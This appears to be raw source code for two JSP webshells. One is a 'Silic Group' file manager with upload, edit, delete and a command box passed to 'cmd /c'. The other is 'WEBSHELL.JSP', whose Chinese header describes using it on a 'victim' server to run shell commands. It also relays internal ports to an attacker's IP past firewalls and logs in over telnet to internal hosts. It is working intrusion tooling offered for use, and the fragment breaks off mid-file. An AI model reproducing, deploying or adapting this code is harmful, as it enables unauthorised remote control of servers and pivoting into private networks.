sbCopy.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
sbCopy.append("原始文件: "+strPath+"<p>");
sbCopy.append("目标文件: <input type=text name=file2 size=40 value='"+strDir+"'><p>");
sbCopy.append("<input type=submit name=save value=' "+strFileCopy[languageNo]+" '> ");
sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> <p>&nbsp;\r\n");
sbCopy.append("</form>");
}
if(strAction!=null && strAction.equals("savecopy"))
{
File f=new File(strPath);
String strDesFile=request.getParameter("file2");
if(strDesFile==null || strDesFile.equals(""))
{
sbSaveCopy.append("<p><font color=red>目标文件错误。</font>");
}
else
{
File f_des=new File(strDesFile);
if(f_des.isFile())
{
sbSaveCopy.append("<p><font color=red>目标文件已存在,不能复制。</font>");
}
else
{
String strTmpFile=strDesFile;
if(f_des.isDirectory())
{
if(!strDesFile.endsWith("\\"))
{
strDesFile=strDesFile+"\\";
}
strTmpFile=strDesFile+"cqq_"+strFile;
}
File f_des_copy=new File(strTmpFile);
FileInputStream in1=new FileInputStream(f);
FileOutputStream out1=new FileOutputStream(f_des_copy);
byte[] buffer=new byte[1024];
int c;
while((c=in1.read(buffer))!=-1)
{
out1.write(buffer,0,c);
}
in1.close();
out1.close();
sbSaveCopy.append("原始文件 "+strPath+"<p>");
sbSaveCopy.append("目标文件 "+strTmpFile+"<p>");
sbSaveCopy.append("<font color=red>复制成功!</font>");
}
}
sbSaveCopy.append("<p><input type=button name=saveCopyBack onclick='history.back(-2);' value=返回>");
}
if(strAction!=null && strAction.equals("newFile"))
{
String strF=request.getParameter("fileName");
String strType1=request.getParameter("btnNewFile");
String strType2=request.getParameter("btnNewDir");
String strType="";
if(strType1==null)
{
strType="Dir";
}
else if(strType2==null)
{
strType="File";
}
if(!strType.equals("") && !(strF==null || strF.equals("")))
{
File f_new=new File(strF);
if(strType.equals("File") && !f_new.createNewFile())
sbNewFile.append(strF+" 文件创建失败");
if(strType.equals("Dir") && !f_new.mkdirs())
sbNewFile.append(strF+" 目录创建失败");
}
else
{
sbNewFile.append("<p><font color=red>建立文件或目录失败</font>");
}
}
if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart")))
{
String tempdir=".";
boolean error=false;
response.setContentType("text/html");
sbNewFile.append("<p><font color=red>建立文件或目录失败</font>");
HttpMultiPartParser parser = new HttpMultiPartParser();
int bstart = request.getContentType().lastIndexOf("oundary=");
String bound = request.getContentType().substring(bstart + 8);
int clength = request.getContentLength();
Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);
if (ht.get("cqqUploadFile") != null)
{
FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
File f1 = fi.file;
UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
if (info != null && info.aborted)
{
f1.delete();
request.setAttribute("error", "Upload aborted");
}
else
{
String path = (String) ht.get("path");
if(path!=null && !path.endsWith("\\"))
path = path + "\\";
if (!f1.renameTo(new File(path + f1.getName())))
{
request.setAttribute("error", "Cannot upload file.");
error = true;
f1.delete();
}
}
}
}
%>
<html><head>
<style type="text/css">
td,select,input,body{font-size:9pt;}
A { TEXT-DECORATION: none }
#tablist{
padding: 5px 0;
margin-left: 0;
margin-bottom: 0;
margin-top: 0.1em;
font:9pt;
}
#tablist li{
list-style: none;
display: inline;
margin: 0;
}
#tablist li a{
padding: 3px 0.5em;
margin-left: 3px;
border: 1px solid ;
background: F6F6F6;
}
#tablist li a:link, #tablist li a:visited{
color: navy;
}
#tablist li a.current{
background: #EAEAFF;
}
#tabcontentcontainer{
width: 100%;
padding: 5px;
border: 1px solid black;
}
.tabcontent{
display:none;
}
</style>
<script type="text/javascript">
var initialtab=[<%=tabID%>, "menu<%=tabID%>"]
function cascadedstyle(el, cssproperty, csspropertyNS){
if (el.currentStyle)
return el.currentStyle[cssproperty]
else if (window.getComputedStyle){
var elstyle=window.getComputedStyle(el, "")
return elstyle.getPropertyValue(csspropertyNS)
}
}
var previoustab=""
function expandcontent(cid, aobject){
if (document.getElementById){
highlighttab(aobject)
if (previoustab!="")
document.getElementById(previoustab).style.display="none"
document.getElementById(cid).style.display="block"
previoustab=cid
if (aobject.blur)
aobject.blur()
return false
}
else
return true
}
function highlighttab(aobject){
if (typeof tabobjlinks=="undefined")
collecttablinks()
for (i=0; i<tabobjlinks.length; i++)
tabobjlinks[i].style.backgroundColor=initTabcolor
var themecolor=aobject.getAttribute("theme")? aobject.getAttribute("theme") : initTabpostcolor
aobject.style.backgroundColor=document.getElementById("tabcontentcontainer").style.backgroundColor=themecolor
}
function collecttablinks(){
var tabobj=document.getElementById("tablist")
tabobjlinks=tabobj.getElementsByTagName("A")
}
function do_onload(){
collecttablinks()
initTabcolor=cascadedstyle(tabobjlinks[1], "backgroundColor", "background-color")
initTabpostcolor=cascadedstyle(tabobjlinks[0], "backgroundColor", "background-color")
expandcontent(initialtab[1], tabobjlinks[initialtab[0]-1])
}
if (window.addEventListener)
window.addEventListener("load", do_onload, false)
else if (window.attachEvent)
window.attachEvent("onload", do_onload)
else if (document.getElementById)
window.onload=do_onload
</script>
<script language="javascript">
function doForm(action,path,file,cmd,tab,content)
{
document.frmCqq.action.value=action;
document.frmCqq.path.value=path;
document.frmCqq.file.value=file;
document.frmCqq.cmd.value=cmd;
document.frmCqq.tabID.value=tab;
document.frmCqq.content.value=content;
if(action=="del")
{
if(confirm("确定要删除文件 "+file+" 吗?"))
document.frmCqq.submit();
}
else
{
document.frmCqq.submit();
}
}
</script>
<title>::Silic Group::</title>
<head>
<body>
<form name="frmCqq" method="post" action="">
<input type="hidden" name="action" value="">
<input type="hidden" name="path" value="">
<input type="hidden" name="file" value="">
<input type="hidden" name="cmd" value="">
<input type="hidden" name="tabID" value="2">
<input type="hidden" name="content" value="">
</form>
<!--Top Menu Started-->
<ul id="tablist">
<li><a href="http://www.blackbap.com" class="current" onClick="return expandcontent('menu1', this)"> <%=strFileManage[languageNo]%> </a></li>
<li><a href="new.htm" onClick="return expandcontent('menu2', this)" theme="#EAEAFF"> <%=strCommand[languageNo]%> </a></li>
<li><a href="hot.htm" onClick="return expandcontent('menu3', this)" theme="#EAEAFF"> <%=strSysProperty[languageNo]%> </a></li>
<li><a href="search.htm" onClick="return expandcontent('menu4', this)" theme="#EAEAFF"> <%=strHelp[languageNo]%> </a></li>
&nbsp; <%=authorInfo[languageNo]%>
</ul>
<!--Top Menu End-->
<%
StringBuffer sbFolder=new StringBuffer("");
StringBuffer sbFile=new StringBuffer("");
try
{
File objFile = new File(strDir);
File list[] = objFile.listFiles();
if(objFile.getAbsolutePath().length()>3)
{
sbFolder.append("<tr><td >&nbsp;</td><td><a href=\"javascript:doForm('','"+formatPath(objFile.getParentFile().getAbsolutePath())+"','','"+strCmd+"','1','');\">");
sbFolder.append(strParentFolder[languageNo]+"</a><br>- - - - - - - - - - - </td></tr>\r\n ");
}
for(int i=0;i<list.length;i++)
{
if(list[i].isDirectory())
{
sbFolder.append("<tr><td >&nbsp;</td><td>");
sbFolder.append(" <a href=\"javascript:doForm('','"+formatPath(list[i].getAbsolutePath())+"','','"+strCmd+"','1','');\">");
sbFolder.append(list[i].getName()+"</a><br></td></tr> ");
}
else
{
String strLen="";
String strDT="";
long lFile=0;
lFile=list[i].length();
strLen = convertFileSize(lFile);
Date dt=new Date(list[i].lastModified());
strDT=dt.toLocaleString();
sbFile.append("<tr onmouseover=\"this.style.backgroundColor='#FBFFC6'\" onmouseout=\"this.style.backgroundColor='white'\"><td>");
sbFile.append(""+list[i].getName());
sbFile.append("</td><td>");
sbFile.append(""+strLen);
sbFile.append("</td><td>");
sbFile.append(""+strDT);
sbFile.append("</td><td>");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('edit','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileEdit[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('del','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileDel[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('down','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileDown[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('copy','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileCopy[languageNo]+"</a> ");
}
}
}
catch(Exception e)
{
out.println("<font color=red>操作失败: "+e.toString()+"</font>");
}
%>
<DIV id="tabcontentcontainer">
<div id="menu3" class="tabcontent">
null
</div>
<div id="menu4" class="tabcontent">
<br><p>说明</p><p>Recoding by Juliet From:<a href="http://blackbap.org">Silic Group Inc.</a></p>
</div>
<div id="menu1" class="tabcontent">
<%
out.println("<table border='1' width='100%' bgcolor='#FBFFC6' cellspacing=0 cellpadding=5 bordercolorlight=#000000 bordercolordark=#FFFFFF><tr><td width='30%'>"+strCurrentFolder[languageNo]+" <b>"+strDir+"</b></td><td>" + getDrivers() + "</td></tr></table><br>\r\n");
%>
<table width="100%" border="1" cellspacing="0" cellpadding="5" bordercolorlight="#000000" bordercolordark="#FFFFFF"><tr><td width="25%" align="center" valign="top"><table width="98%" border="0" cellspacing="0" cellpadding="3"><%=sbFolder%></tr></table></td><td width="81%" align="left" valign="top">
<%
if(strAction!=null && strAction.equals("edit"))
{
out.println(sbEdit.toString());
}
else if(strAction!=null && strAction.equals("copy"))
{
out.println(sbCopy.toString());
}
else if(strAction!=null && strAction.equals("down"))
{
out.println(sbDown.toString());
}
else if(strAction!=null && strAction.equals("savecopy"))
{
out.println(sbSaveCopy.toString());
}
else if(strAction!=null && strAction.equals("newFile") && !sbNewFile.toString().equals(""))
{
out.println(sbNewFile.toString());
}
else
{
%>
<span id="EditBox"><table width="98%" border="1" cellspacing="1" cellpadding="4" bordercolorlight="#cccccc" bordercolordark="#FFFFFF" bgcolor="white" >
<tr bgcolor="#E7e7e6">
<td width="26%"><%=strFileName[languageNo]%></td>
<td width="19%"><%=strFileSize[languageNo]%></td>
<td width="29%"><%=strLastModified[languageNo]%></td>
<td width="26%"><%=strFileOperation[languageNo]%></td>
</tr>
<%=sbFile%>
</table></span>
<%
}
%></td></tr>
<form name="frmMake" action="" method="post">
<tr><td colspan=2 bgcolor=#FBFFC6>
<input type="hidden" name="action" value="newFile">
<input type="hidden" name="path" value="<%=strDir%>">
<input type="hidden" name="file" value="<%=strFile%>">
<input type="hidden" name="cmd" value="<%=strCmd%>">
<input type="hidden" name="tabID" value="1">
<input type="hidden" name="content" value="">
<%
if(!strDir.endsWith("\\"))
strDir = strDir + "\\";
%>
<input type="text" name="fileName" size=36 value="<%=strDir%>">
<input type="submit" name="btnNewFile" value="新建文件" onclick="frmMake.submit()" >
<input type="submit" name="btnNewDir" value="新建目录" onclick="frmMake.submit()" >
</form>
<form name="frmUpload" enctype="multipart/form-data" action="" method="post">
<input type="hidden" name="action" value="upload">
<input type="hidden" name="path" value="<%=strDir%>">
<input type="hidden" name="file" value="<%=strFile%>">
<input type="hidden" name="cmd" value="<%=strCmd%>">
<input type="hidden" name="tabID" value="1">
<input type="hidden" name="content" value="">
<input type="file" name="cqqUploadFile" size="36">
<input type="submit" name="submit" value="上传">
</td></tr></form>
</table>
</div>
<div id="menu2" class="tabcontent">
<%
String line="";
StringBuffer sbCmd=new StringBuffer("");
if(strCmd!=null)
{
try
{
//out.println(strCmd);
Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null)
{
sbCmd.append(line+"\r\n");
}
}
catch(Exception e)
{
System.out.println(e.toString());
}
}
else
{
strCmd = "set";
}
%>
<form name="cmd" action="" method="post">
&nbsp;
<input type="text" name="cmd" value="<%=strCmd%>" size=50>
<input type="hidden" name="tabID" value="2">
<input type=submit name=submit value="<%=strExecute[languageNo]%>">
</form>
<%
if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
{
%>
&nbsp;<TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TEXTAREA>
<br>&nbsp;
<%
}
%>
</DIV></div>
<center>All Rights Reserved, <a href="http://blackbap.org" target="_blank">blackbap.org</a> &copy; Silic Group Inc.</center>


@ -0,0 +1,814 @@
<%
/*
* WEBSHELL.JSP
*
* Author: lovehacker
* E-mail: wangyun188@hotmail.com
*
* 使用方法:
* ]http://victim/webshell.jsp?[options]
* options:
* action=piped&remoteHost=&remotePort=&myIp=&myPort=
* action=tunnel&remoteHost=&remotePort=&myPort=
* action=login&username=&password=&myPort=
* action=send&myShell=&myPort=&cmd=
* action=close&myPort=
* action=shell&cmd=
* 例子:
* action=piped&remoteHost=192.168.0.1&remotePort=25&myIp=218.0.0.1&myPort=12345 -- 将192.168.0.1的25端口与218.0.0.1的12345端口连接起来可以先用NC监听12345端口。适用于你无法直接访问已控制的WEB服务器的内网里某机器的某端口而防火墙又未过滤该WEB服务器向外的连接。
* action=tunnel&remoteHost=192.168.0.1&remotePort=23&myPort=65534 -- 实现通过访问该webshell.jsp访问内网某主机telnet服务的功能。原本想实现通过访问webshell.jsp实现对内网任意服务访问的功能但jsp功能有限实现起来较为复杂适用于你控制的机器只开了80端口并且防火墙不允许它访问Internet而你又非常想访问它内网某主机的Telnet服务:-)
* action=login&username=root&password=helloroot&myPort=65534 -- 上一步只是告诉了要Telnet那台机器这一步才开始真正登陆你要输入要telnet主机的正确的用户名密码才行喔要不然谁也没办法。
* action=send&myShell=&myPort=&cmd= -- 上一步如果顺利完成那么你就可以在上边执行你想执行的命令了。myShell这个参数是结束标记否则无法知道数据流什么时间该结束一定要写对喔否则嘿嘿就麻烦罗。cmd这个参数就是你要执行的命令了比如“which ssh”建议你这样玩myShell=lovehacker&cmd=ls -la;echo lovehacker。
* action=close&myPort= -- 你是退出了telnet登陆但程序在主机上开放的端口还没关闭所以你要再执行这个命令现场打扫干净嘛。
* action=shell&cmd= -- 在你控制的这台机器上执行命令。Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\winnt\system32\cmd.exe /c type c:\winnt\win.ini
* 程序说明:
* 想通过jsp实现telnet代理的时候着实头痛了一把每个请求都是一个新的线程client socket去连接
* telnet服务只能批量命令无法实现与用户的交互后来想了个笨办法把telnet的过程分步完成
* 收到tunnel命令后先起两个线程一个监听端口等待连接一个先和远程服务器建立好端口连接并一
* 直不断开这下server socket再一次一次的收数据一次次的转发到远程服务器就可以记录状态
* 现和用户的交互了但总觉得这办法太笨如果用JSP实现telnet代理功能你有更好的办法的话请一定
* 要来信告诉我。
* 版权说明:
* 本身实现Telnet的功能我也是在人家代码的基础上修改的所以版权没有你可以任意修改、复制。
* 只是加了新功能别忘了Mail一份给我喔
*
*
*/
%>
<%@ page import="java.io.*" %>
<%@ page import="java.net.*" %>
<%@ page import="java.util.*" %>
<%@ page import="java.awt.Dimension" %>
<%
class redirector implements Runnable
{
private redirector companion = null;
private Socket localSocket, remoteSocket;
private InputStream from;
private OutputStream to;
private byte[] buffer = new byte[4096];
public redirector(Socket local, Socket remote)
{
try {
localSocket = local;
remoteSocket = remote;
from = localSocket.getInputStream();
to = remoteSocket.getOutputStream();
} catch(Exception e) {}
}
public void couple(redirector c) {
companion = c;
Thread listen = new Thread(this);
listen.start();
}
public void decouple() { companion = null; }
public void run()
{
int count;
try {
while(companion != null) {
if((count = from.read(buffer)) < 0)
break;
to.write(buffer, 0, count);
}
} catch(Exception e) {}
try {
from.close();
to.close();
localSocket.close();
remoteSocket.close();
if(companion != null) companion.decouple();
} catch(Exception io) {}
}
}
class redirector1 implements Runnable
{
private redirector1 companion = null;
private Socket localSocket, remoteSocket;
private InputStream from;
private OutputStream to;
private byte[] buffer = new byte[4096];
public redirector1(Socket local, Socket remote)
{
try {
localSocket = local;
remoteSocket = remote;
from = localSocket.getInputStream();
to = remoteSocket.getOutputStream();
} catch(Exception e) {}
}
public void couple(redirector1 c) {
companion = c;
Thread listen = new Thread(this);
listen.start();
}
public void decouple() { companion = null; }
public void run()
{
String tmp = "";
int count;
try {
while(companion != null) {
if((count = from.read(buffer)) < 0) break;
tmp = new String(buffer);
if(tmp.startsWith("--GoodBye--"))
{
from.close();
to.close();
remoteSocket.close();
localSocket.close();
System.exit(1);
}
to.write(buffer, 0, count);
}
} catch(Exception e) {}
try {
if(companion != null) companion.decouple();
} catch(Exception io) {}
}
}
class piped implements Runnable
{
String remoteHost1,remoteHost2;
int remotePort1, remotePort2;
Thread listener, connection;
public piped(String raddr1,int rport1, String raddr2, int rport2)
{
remoteHost1 = raddr1; remotePort1 = rport1;
remoteHost2 = raddr2; remotePort2 = rport2;
listener = new Thread(this);
listener.setPriority(Thread.MIN_PRIORITY);
listener.start();
}
public void run()
{
Socket destinationSocket1 = null;
Socket destinationSocket2 = null;
try {
destinationSocket1 = new Socket(remoteHost1,remotePort1);
destinationSocket2 = new Socket(remoteHost2, remotePort2);
redirector r1 = new redirector(destinationSocket1, destinationSocket2);
redirector r2 = new redirector(destinationSocket2, destinationSocket1);
r1.couple(r2);
r2.couple(r1);
} catch(Exception e) {
try {
DataOutputStream os = new DataOutputStream(destinationSocket2.getOutputStream());
os.writeChars("Remote host refused connection.\n");
destinationSocket2.close();
} catch(IOException ioe) { }
}
}
}
class tunnel implements Runnable
{
String remoteHost;
int localPort, remotePort;
Thread listener, connection;
ServerSocket server;
public tunnel(int lport, String raddr, int rport)
{
localPort = lport;
remoteHost = raddr; remotePort = rport;
try {
server = new ServerSocket(localPort);
} catch(Exception e) {}
listener = new Thread(this);
listener.setPriority(Thread.MIN_PRIORITY);
listener.start();
}
public void run()
{
Socket destinationSocket = null;
try{
destinationSocket = new Socket(remoteHost, remotePort);
}catch(Exception e){}
while(true)
{
Socket localSocket = null;
try {
localSocket = server.accept();
} catch(Exception e) {
continue;
}
try {
redirector1 r1 = new redirector1(localSocket, destinationSocket);
redirector1 r2 = new redirector1(destinationSocket, localSocket);
r1.couple(r2);
r2.couple(r1);
} catch(Exception e) {
try {
DataOutputStream os = new DataOutputStream(localSocket.getOutputStream());
os.writeChars("Remote host refused connection.\n");
localSocket.close();
} catch(IOException ioe) {}
continue;
}
}
}
}
class TelnetIO
{
public String toString() { return "$Id: TelnetIO.java,v 1.10 1998/02/09 10:22:18 leo Exp $"; }
private int debug = 0;
private byte neg_state = 0;
private final static byte STATE_DATA = 0;
private final static byte STATE_IAC = 1;
private final static byte STATE_IACSB = 2;
private final static byte STATE_IACWILL = 3;
private final static byte STATE_IACDO = 4;
private final static byte STATE_IACWONT = 5;
private final static byte STATE_IACDONT = 6;
private final static byte STATE_IACSBIAC = 7;
private final static byte STATE_IACSBDATA = 8;
private final static byte STATE_IACSBDATAIAC = 9;
private byte current_sb;
private final static byte IAC = (byte)255;
private final static byte EOR = (byte)239;
private final static byte WILL = (byte)251;
private final static byte WONT = (byte)252;
private final static byte DO = (byte)253;
private final static byte DONT = (byte)254;
private final static byte SB = (byte)250;
private final static byte SE = (byte)240;
private final static byte TELOPT_ECHO = (byte)1; /* echo on/off */
private final static byte TELOPT_EOR = (byte)25; /* end of record */
private final static byte TELOPT_NAWS = (byte)31; /* NA-WindowSize*/
private final static byte TELOPT_TTYPE = (byte)24; /* terminal type */
private final byte[] IACWILL = { IAC, WILL };
private final byte[] IACWONT = { IAC, WONT };
private final byte[] IACDO = { IAC, DO };
private final byte[] IACDONT = { IAC, DONT };
private final byte[] IACSB = { IAC, SB };
private final byte[] IACSE = { IAC, SE };
private final byte TELQUAL_IS = (byte)0;
private final byte TELQUAL_SEND = (byte)1;
private byte[] receivedDX;
private byte[] receivedWX;
private byte[] sentDX;
private byte[] sentWX;
private Socket socket;
private BufferedInputStream is;
private BufferedOutputStream os;
//private StatusPeer peer = this; /* peer, notified on status */
public void connect(String address, int port) throws IOException {
if(debug > 0) System.out.println("Telnet.connect("+address+","+port+")");
socket = new Socket(address, port);
is = new BufferedInputStream(socket.getInputStream());
os = new BufferedOutputStream(socket.getOutputStream());
neg_state = 0;
receivedDX = new byte[256];
sentDX = new byte[256];
receivedWX = new byte[256];
sentWX = new byte[256];
}
public void disconnect() throws IOException {
if(debug > 0) System.out.println("TelnetIO.disconnect()");
if(socket !=null) socket.close();
}
public void connect(String address) throws IOException {
connect(address, 23);
}
//public void setPeer(StatusPeer obj) { peer = obj; }
public int available() throws IOException
{
return is.available();
}
public byte[] receive() throws IOException {
int count = is.available();
byte buf[] = new byte[count];
count = is.read(buf);
if(count < 0) throw new IOException("Connection closed.");
if(debug > 1) System.out.println("TelnetIO.receive(): read bytes: "+count);
buf = negotiate(buf, count);
return buf;
}
public void send(byte[] buf) throws IOException {
if(debug > 1) System.out.println("TelnetIO.send("+buf+")");
os.write(buf);
os.flush();
}
public void send(byte b) throws IOException {
if(debug > 1) System.out.println("TelnetIO.send("+b+")");
os.write(b);
os.flush();
}
private void handle_sb(byte type, byte[] sbdata, int sbcount)
throws IOException
{
if(debug > 1)
System.out.println("TelnetIO.handle_sb("+type+")");
switch (type) {
case TELOPT_TTYPE:
if (sbcount>0 && sbdata[0]==TELQUAL_SEND) {
String ttype;
send(IACSB);send(TELOPT_TTYPE);send(TELQUAL_IS);
/* FIXME: need more logic here if we use
* more than one terminal type
*/
Vector vec = new Vector(2);
vec.addElement("TTYPE");
ttype = (String)notifyStatus(vec);
if(ttype == null) ttype = "dumb";
byte[] bttype = new byte[ttype.length()];
ttype.getBytes(0,ttype.length(), bttype, 0);
send(bttype);
send(IACSE);
}
}
}
public Object notifyStatus(Vector status) {
if(debug > 0)
System.out.println("TelnetIO.notifyStatus("+status+")");
return null;
}
private byte[] negotiate(byte buf[], int count) throws IOException {
if(debug > 1)
System.out.println("TelnetIO.negotiate("+buf+","+count+")");
byte nbuf[] = new byte[count];
byte sbbuf[] = new byte[count];
byte sendbuf[] = new byte[3];
byte b,reply;
int sbcount = 0;
int boffset = 0, noffset = 0;
Vector vec = new Vector(2);
while(boffset < count) {
b=buf[boffset++];
if (b>=128)
b=(byte)((int)b-256);
switch (neg_state) {
case STATE_DATA:
if (b==IAC) {
neg_state = STATE_IAC;
} else {
nbuf[noffset++]=b;
}
break;
case STATE_IAC:
switch (b) {
case IAC:
if(debug > 2)
System.out.print("IAC ");
neg_state = STATE_DATA;
nbuf[noffset++]=IAC;
break;
case WILL:
if(debug > 2)
System.out.print("WILL ");
neg_state = STATE_IACWILL;
break;
case WONT:
if(debug > 2)
System.out.print("WONT ");
neg_state = STATE_IACWONT;
break;
case DONT:
if(debug > 2)
System.out.print("DONT ");
neg_state = STATE_IACDONT;
break;
case DO:
if(debug > 2)
System.out.print("DO ");
neg_state = STATE_IACDO;
break;
case EOR:
if(debug > 2)
System.out.print("EOR ");
neg_state = STATE_DATA;
break;
case SB:
if(debug > 2)
System.out.print("SB ");
neg_state = STATE_IACSB;
sbcount = 0;
break;
default:
if(debug > 2)
System.out.print(
"<UNKNOWN "+b+" > "
);
neg_state = STATE_DATA;
break;
}
break;
case STATE_IACWILL:
switch(b) {
case TELOPT_ECHO:
if(debug > 2)
System.out.println("ECHO");
reply = DO;
vec = new Vector(2);
vec.addElement("NOLOCALECHO");
notifyStatus(vec);
break;
case TELOPT_EOR:
if(debug > 2)
System.out.println("EOR");
reply = DO;
break;
default:
if(debug > 2)
System.out.println(
"<UNKNOWN,"+b+">"
);
reply = DONT;
break;
}
if(debug > 1)
System.out.println("<"+b+", WILL ="+WILL+">");
if ( reply != sentDX[b+128] ||
WILL != receivedWX[b+128]
) {
sendbuf[0]=IAC;
sendbuf[1]=reply;
sendbuf[2]=b;
send(sendbuf);
sentDX[b+128] = reply;
receivedWX[b+128] = WILL;
}
neg_state = STATE_DATA;
break;
case STATE_IACWONT:
switch(b) {
case TELOPT_ECHO:
if(debug > 2)
System.out.println("ECHO");
vec = new Vector(2);
vec.addElement("LOCALECHO");
notifyStatus(vec);
reply = DONT;
break;
case TELOPT_EOR:
if(debug > 2)
System.out.println("EOR");
reply = DONT;
break;
default:
if(debug > 2)
System.out.println(
"<UNKNOWN,"+b+">"
);
reply = DONT;
break;
}
if ( reply != sentDX[b+128] ||
WONT != receivedWX[b+128]
) {
sendbuf[0]=IAC;
sendbuf[1]=reply;
sendbuf[2]=b;
send(sendbuf);
sentDX[b+128] = reply;
receivedWX[b+128] = WILL;
}
neg_state = STATE_DATA;
break;
case STATE_IACDO:
switch (b) {
case TELOPT_ECHO:
if(debug > 2)
System.out.println("ECHO");
reply = WILL;
vec = new Vector(2);
vec.addElement("LOCALECHO");
notifyStatus(vec);
break;
case TELOPT_TTYPE:
if(debug > 2)
System.out.println("TTYPE");
reply = WILL;
break;
case TELOPT_NAWS:
if(debug > 2)
System.out.println("NAWS");
vec = new Vector(2);
vec.addElement("NAWS");
Dimension size = (Dimension)
notifyStatus(vec);
receivedDX[b] = DO;
if(size == null)
{
/* this shouldn't happen */
send(IAC);
send(WONT);
send(TELOPT_NAWS);
reply = WONT;
sentWX[b] = WONT;
break;
}
reply = WILL;
sentWX[b] = WILL;
sendbuf[0]=IAC;
sendbuf[1]=WILL;
sendbuf[2]=TELOPT_NAWS;
send(sendbuf);
send(IAC);send(SB);send(TELOPT_NAWS);
send((byte) (size.width >> 8));
send((byte) (size.width & 0xff));
send((byte) (size.height >> 8));
send((byte) (size.height & 0xff));
send(IAC);send(SE);
break;
default:
if(debug > 2)
System.out.println(
"<UNKNOWN,"+b+">"
);
reply = WONT;
break;
}
if ( reply != sentWX[128+b] ||
DO != receivedDX[128+b]
) {
sendbuf[0]=IAC;
sendbuf[1]=reply;
sendbuf[2]=b;
send(sendbuf);
sentWX[b+128] = reply;
receivedDX[b+128] = DO;
}
neg_state = STATE_DATA;
break;
case STATE_IACDONT:
switch (b) {
case TELOPT_ECHO:
if(debug > 2)
System.out.println("ECHO");
reply = WONT;
vec = new Vector(2);
vec.addElement("NOLOCALECHO");
notifyStatus(vec);
break;
case TELOPT_NAWS:
if(debug > 2)
System.out.println("NAWS");
reply = WONT;
break;
default:
if(debug > 2)
System.out.println(
"<UNKNOWN,"+b+">"
);
reply = WONT;
break;
}
if ( reply != sentWX[b+128] ||
DONT != receivedDX[b+128]
) {
send(IAC);send(reply);send(b);
sentWX[b+128] = reply;
receivedDX[b+128] = DONT;
}
neg_state = STATE_DATA;
break;
case STATE_IACSBIAC:
if(debug > 2) System.out.println(""+b+" ");
if (b == IAC) {
sbcount = 0;
current_sb = b;
neg_state = STATE_IACSBDATA;
} else {
System.out.println("(bad) "+b+" ");
neg_state = STATE_DATA;
}
break;
case STATE_IACSB:
if(debug > 2) System.out.println(""+b+" ");
switch (b) {
case IAC:
neg_state = STATE_IACSBIAC;
break;
default:
current_sb = b;
sbcount = 0;
neg_state = STATE_IACSBDATA;
break;
}
break;
case STATE_IACSBDATA:
if (debug > 2) System.out.println(""+b+" ");
switch (b) {
case IAC:
neg_state = STATE_IACSBDATAIAC;
break;
default:
sbbuf[sbcount++] = b;
break;
}
break;
case STATE_IACSBDATAIAC:
if (debug > 2) System.out.println(""+b+" ");
switch (b) {
case IAC:
neg_state = STATE_IACSBDATA;
sbbuf[sbcount++] = IAC;
break;
case SE:
handle_sb(current_sb,sbbuf,sbcount);
current_sb = 0;
neg_state = STATE_DATA;
break;
case SB:
handle_sb(current_sb,sbbuf,sbcount);
neg_state = STATE_IACSB;
break;
default:
neg_state = STATE_DATA;
break;
}
break;
default:
if (debug > 2)
System.out.println(
"This should not happen: "+
neg_state+" "
);
neg_state = STATE_DATA;
break;
}
}
buf = new byte[noffset];
System.arraycopy(nbuf, 0, buf, 0, noffset);
return buf;
}
}
class TelnetConnect
{
TelnetIO tio = new TelnetIO();
int port = 0;
public TelnetConnect(int port)
{
this.port = port;
}
public void connect()
{
try {
tio.connect("localhost",port);
} catch(IOException e) {}
}
public void disconnect()
{
try{
tio.disconnect();
}catch(IOException e){}
}
private String wait(String prompt)
{
String tmp = "";
do {
try {
tmp += new String(tio.receive(), 0);
}catch(IOException e) {}
} while(tmp.indexOf(prompt) == -1);
return tmp;
}
private byte[] receive()
{
byte[] temp = null;
try{
temp = tio.receive();
}catch(IOException e){}
return temp;
}
private String waitshell()
{
String tmp = "";
do {
try { tmp += new String(tio.receive(), 0); }
catch(IOException e) {}
} while((tmp.indexOf("$") == -1)&&(tmp.indexOf("#") == -1)&&(tmp.indexOf("%") == -1));
return tmp;
}
private void send(String str)
{
byte[] buf = new byte[str.length()];
str.getBytes(0, str.length(), buf, 0);
try { tio.send(buf); } catch(IOException e) {}
}
}
%>
<%
String action = request.getParameter("action");
String cmd = request.getParameter("cmd");
String remoteHost = request.getParameter("remoteHost");
String myIp = request.getParameter("myIp");
String myPort = request.getParameter("myPort");
String remotePort = request.getParameter("remotePort");
String username = request.getParameter("username");
String password = request.getParameter("password");
String myShell = request.getParameter("myShell");
if(action.equals("shell")){
try {
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) { out.print((char)c); }
in.close();
try { child.waitFor();} catch (InterruptedException e) {}
} catch (IOException e) {}
}else if(action.equals("piped")){
piped me = new piped(remoteHost,Integer.parseInt(remotePort),myIp,Integer.parseInt(myPort));
}else if(action.equals("tunnel")){
tunnel me = new tunnel(Integer.parseInt(myPort),
remoteHost, Integer.parseInt(remotePort));
}else if(action.equals("login")){
TelnetConnect tc = new TelnetConnect(Integer.parseInt(myPort));
tc.connect();
out.print(tc.wait("login:"));
tc.send(username+"\r");
out.print(tc.wait("Password:"));
tc.send(password+"\r");
out.print(tc.waitshell());
tc.disconnect();
